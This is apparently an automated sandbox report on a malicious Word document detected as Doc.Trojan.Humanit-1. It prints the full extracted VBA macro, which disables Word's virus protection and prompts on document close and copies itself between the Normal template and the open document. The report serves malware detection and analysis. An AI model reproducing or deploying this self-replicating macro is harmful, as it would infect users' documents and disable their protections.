MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros. The macros appear to be designed to copy themselves between the Normal template and the active document, a technique often used for persistence or to complicate analysis. The ClamAV detection 'Doc.Trojan.Humanit-1' and the heuristic firing for VBA macros strongly indicate malicious intent, though the specific payload or ultimate goal is not directly revealed by the provided evidence.
Heuristics 2
-
ClamAV: Doc.Trojan.Humanit-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Humanit-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 953 bytes |
SHA-256: c48caf3ef041a6123d823118de07c59a0466c2d6b8f604fdcb22ebcf0d0832b5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Rem Humanitvir
cisti:
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Set n = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set d = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If n.Lines(4, 1) <> "cisti:" Then
Do Until n.CountOfLines = 0
n.DeleteLines 1, 1
Loop
For a = 1 To d.CountOfLines
n.InsertLines a, d.Lines(a, 1)
Next a
End If
If d.Lines(4, 1) <> "cisti:" Then
Do Until d.CountOfLines = 0
d.DeleteLines 1, 1
Loop
For a = 1 To n.CountOfLines
d.InsertLines a, n.Lines(a, 1)
Next a
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.